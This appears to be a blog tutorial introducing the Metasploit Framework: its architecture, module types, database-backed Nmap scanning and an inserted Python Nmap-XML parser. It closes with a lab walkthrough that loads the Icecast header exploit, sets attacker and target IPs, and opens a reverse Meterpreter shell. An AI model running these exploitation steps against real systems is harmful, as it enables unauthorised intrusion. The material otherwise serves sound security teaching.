Metasploit

Sahil Sharma
4 min read · Feb 17, 2021


Metasploit Framework

The Metasploit Framework is a powerful tool written in Ruby that is used for penetration testing; it lets you exploit a specific vulnerability in a system. The framework is a suite of tools that security researchers use to identify system vulnerabilities, enumerate networks and execute attacks.

The steps involved in exploiting a system with the Metasploit Framework are:

1. Check whether the system is vulnerable to an exploit.

2. Choose the exploit for the specific vulnerability.

3. Configure the payload.

4. Run the exploit.

Metasploit Architecture

Metasploit Libraries :-

The libraries let us run our exploits without having to write additional code of our own, such as HTTP requests or payload encoding.

REX :-
Rex handles protocols, sockets, text manipulation, etc. It is the basic library for most tasks, such as HTTP, SMB, SSL and many others.

MSF CORE :-
This library defines the whole Metasploit Framework and provides the basic API.

MSF BASE :-
It provides simplified APIs for use in the Metasploit Framework.

The most important part of the framework is its modules:

EXPLOIT :-
An exploit module executes a sequence of commands that targets a specific vulnerability in a system or web application and allows the attacker to gain full access to the remote system.
Examples include web application exploits, code injection and buffer overflows.

AUXILIARY :-
Auxiliary modules perform arbitrary actions that are not direct exploitation, because an auxiliary module does not execute a payload.
Examples include fuzzers, scanners and DoS modules.

PAYLOAD :-
A payload is a piece of code that runs after an exploit has successfully taken over the vulnerable system. A payload can be either a command shell or a Meterpreter shell. Meterpreter is the most powerful and advanced payload; it lets you load DLLs (dynamic link libraries), through which new features can be added.

NOP :-
A NOP generator produces a series of random no-op bytes that is used to bypass standard IDS or IPS NOP signatures. This module is also used with buffer overflow and ROP attacks.

POST :-
Post modules are used for post-exploitation: they let you gather more information about, or gain fuller access to, an exploited system. Examples include hash dumps, database information and hidden files.

How to run metasploit :

It is always good practice to start the database service before running the Metasploit command, which you do by simply typing:

service postgresql start

Now run the Metasploit command; it starts with the banner:

msfconsole

We can also start Metasploit without the banner or any other startup information; for that we add the ‘-q’ switch, which stands for ‘quiet’ mode.

msfconsole -q

Let’s explore the help menu at the msf prompt; it gives plenty of information about how to use Metasploit.

help

Metasploit also gives us the option to run a port scanner from inside the msf prompt, and its results are saved directly into our database.

db_nmap -sV 10.10.72.93

Now let’s see what information our database collected from the nmap results above:

hosts

Now let’s pull the service results from the database.

services
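As an added example, not code from the original post or from the Metasploit project: the Python script below parses Nmap XML output (the format Metasploit's `db_import` understands) into the same kind of host and service records that the `hosts` and `services` commands print, and filters them the way `services -p PORT` does. The XML document is a constructed sample for the lab address scanned above, and the function and class names are my own.

```python
"""Added example: turn Nmap XML (-oX) into host/service tables resembling
msfconsole's `hosts` and `services` output. Not part of Metasploit."""
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Constructed sample scan result for the lab host scanned in the post.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX - 10.10.72.93">
  <host>
    <status state="up" reason="echo-reply"/>
    <address addr="10.10.72.93" addrtype="ipv4"/>
    <hostnames><hostname name="lab-host" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="135">
        <state state="open"/><service name="msrpc" product="Microsoft Windows RPC"/>
      </port>
      <port protocol="tcp" portid="445">
        <state state="open"/><service name="microsoft-ds"/>
      </port>
      <port protocol="tcp" portid="8000">
        <state state="open"/><service name="http" product="Icecast streaming media server"/>
      </port>
      <port protocol="tcp" portid="22">
        <state state="closed"/><service name="ssh"/>
      </port>
    </ports>
    <os><osmatch name="Microsoft Windows XP" accuracy="95"/></os>
  </host>
</nmaprun>
"""


@dataclass(frozen=True)
class Host:            # one row of the `hosts` table
    address: str
    name: str
    os_name: str
    state: str


@dataclass(frozen=True)
class Service:         # one row of the `services` table
    host: str
    port: int
    proto: str
    name: str
    state: str
    info: str


def _attr(parent, path, attr, default=""):
    """Attribute `attr` of the first child matching `path`, or `default`."""
    el = parent.find(path)
    return el.get(attr, default) if el is not None else default


def parse_nmap_xml(xml_text):
    """Return (hosts, services) lists built from an Nmap XML document."""
    root = ET.fromstring(xml_text)
    hosts, services = [], []
    for h in root.iter("host"):
        addr = _attr(h, "address[@addrtype='ipv4']", "addr")
        if not addr:
            continue  # skip hosts that have no IPv4 address
        hosts.append(Host(
            address=addr,
            name=_attr(h, "hostnames/hostname", "name"),
            os_name=_attr(h, "os/osmatch", "name"),
            state=_attr(h, "status", "state"),
        ))
        for p in h.iter("port"):
            svc = p.find("service")
            product = svc.get("product", "") if svc is not None else ""
            version = svc.get("version", "") if svc is not None else ""
            services.append(Service(
                host=addr,
                port=int(p.get("portid")),
                proto=p.get("protocol", "tcp"),
                name=svc.get("name", "") if svc is not None else "",
                state=_attr(p, "state", "state"),
                info=" ".join(x for x in (product, version) if x),
            ))
    return hosts, services


def filter_services(services, port=None, state="open", name=None):
    """Mimic `services -p PORT` / `services -s NAME`: keep matching rows."""
    return [s for s in services
            if (not state or s.state == state)
            and (port is None or s.port == port)
            and (not name or s.name == name)]


def format_services(services):
    """Render rows in the column order msfconsole's `services` table uses."""
    lines = ["host             port   proto   name           state    info"]
    for s in services:
        lines.append(f"{s.host:<16} {s.port:<6} {s.proto:<7} "
                     f"{s.name:<14} {s.state:<8} {s.info}")
    return "\n".join(lines)


if __name__ == "__main__":
    hosts, services = parse_nmap_xml(SAMPLE_NMAP_XML)
    for h in hosts:
        print(f"{h.address:<16} {h.name:<10} {h.os_name}  {h.state}")
    print(format_services(filter_services(services)))
```

Pointing `parse_nmap_xml` at a real `nmap -sV -oX scan.xml` file gives the same view you would get from `db_import scan.xml` followed by `hosts` and `services`, which is handy for checking what the database will hold before you start picking modules.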

Now we can use the ‘search’ command to find the specific module to load; we don’t need to specify the exact location of the module.

Suppose we have to search for the Icecast module; then we just need to specify ‘icecast’ with ‘search’ at the msf prompt:

search icecast

Now, to use a specific module, we simply type ‘use’ with the module’s full path:

use exploit/windows/http/icecast_header

Now, to configure our exploit, we simply type ‘show options’:

show options

Before executing our exploit, we have to tell Metasploit the target system’s IP and our local attacker machine’s IP.

To specify the IPs, we simply type ‘set <option> <IP address>’:

set lhost 10.8.137.43
set rhosts 10.10.234.158

Now we are all set up to execute our exploit; it’s time to say the magic word.

exploit

Now a Meterpreter session has opened and we get our reverse shell connection back from the remote machine.
